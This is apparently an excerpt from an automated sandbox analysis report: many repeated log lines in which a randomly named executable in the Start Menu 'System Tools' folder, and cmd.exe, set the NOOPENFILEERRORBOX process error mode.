                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess information set: NOOPENFILEERRORBOX
